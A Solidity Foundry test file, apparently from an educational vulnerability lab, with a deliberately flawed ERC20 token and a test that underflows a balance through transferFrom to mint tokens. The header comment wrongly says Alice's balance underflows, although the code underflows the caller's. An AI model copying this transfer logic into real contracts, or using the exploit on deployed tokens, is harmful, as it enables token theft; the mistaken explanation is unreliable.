-
Notifications
You must be signed in to change notification settings - Fork 287
/
Copy pathOverflow2.sol
129 lines (102 loc) · 4.15 KB
/
Overflow2.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
// SPDX-License-Identifier: MIT
pragma solidity ^0.7.6;
// this need to be older version of solidity from 0.8.0 solidty compiler checks for overflow and underflow
import "forge-std/Test.sol";
/*
Name: Token Whale Overflow Vulnerability
Description:
This contract demonstrates an integer underflow vulnerability in an ERC20 token contract.
The vulnerability exists in the implementation of the transferFrom function. Due to the lack
of automatic overflow checking in Solidity versions before 0.8.0, attackers can exploit
this vulnerability to generate a large amount of tokens.
How it works:
1. Contract initializes with deployer receiving 1000 tokens
2. Deployer transfers 800 tokens to Alice
3. Alice approves the attacker to spend 1000 tokens
4. Attacker uses transferFrom to transfer 500 tokens from Alice to Bob
5. Due to the lack of overflow checking in the _transfer function's subtraction operation,
an underflow occurs when Alice's balance is insufficient
6. The underflow causes Alice's balance to become an extremely large number,
effectively creating tokens out of thin air
Impact:
- Affects contracts using Solidity < 0.8.0
- Contracts not using SafeMath library
Mitigation:
1. Use Solidity 0.8.0 or later which has built-in overflow checking
2. Use SafeMath library for older versions
3. Properly validate balances before transfers
This vulnerability demonstrates why proper integer overflow/underflow protection is crucial
in smart contract development, particularly in token contracts where numerical operations
are frequent and critical to the contract's security.
*/
contract ContractTest is Test {
TokenWhaleChallenge TokenWhaleChallengeContract;
function testOverflow2() public {
address alice = vm.addr(1);
address bob = vm.addr(2);
TokenWhaleChallengeContract = new TokenWhaleChallenge();
TokenWhaleChallengeContract.TokenWhaleDeploy(address(this));
console.log(
"Player balance:",
TokenWhaleChallengeContract.balanceOf(address(this))
);
TokenWhaleChallengeContract.transfer(address(alice), 800);
vm.prank(alice);
TokenWhaleChallengeContract.approve(address(this), 1000);
TokenWhaleChallengeContract.transferFrom(
address(alice),
address(bob),
500
); //exploit here
console.log("Exploit completed, balance overflowed");
console.log(
"Player balance:",
TokenWhaleChallengeContract.balanceOf(address(this))
);
}
receive() external payable {}
}
contract TokenWhaleChallenge {
address player;
uint256 public totalSupply;
mapping(address => uint256) public balanceOf;
mapping(address => mapping(address => uint256)) public allowance;
string public name = "Simple ERC20 Token";
string public symbol = "SET";
uint8 public decimals = 18;
function TokenWhaleDeploy(address _player) public {
player = _player;
totalSupply = 1000;
balanceOf[player] = 1000;
}
function isComplete() public view returns (bool) {
return balanceOf[player] >= 1000000;
}
event Transfer(address indexed from, address indexed to, uint256 value);
function _transfer(address to, uint256 value) internal {
balanceOf[msg.sender] -= value;
balanceOf[to] += value;
emit Transfer(msg.sender, to, value);
}
function transfer(address to, uint256 value) public {
require(balanceOf[msg.sender] >= value);
require(balanceOf[to] + value >= balanceOf[to]);
_transfer(to, value);
}
event Approval(
address indexed owner,
address indexed spender,
uint256 value
);
function approve(address spender, uint256 value) public {
allowance[msg.sender][spender] = value;
emit Approval(msg.sender, spender, value);
}
function transferFrom(address from, address to, uint256 value) public {
require(balanceOf[from] >= value);
require(balanceOf[to] + value >= balanceOf[to]);
require(allowance[from][msg.sender] >= value);
allowance[from][msg.sender] -= value;
_transfer(to, value);
}
}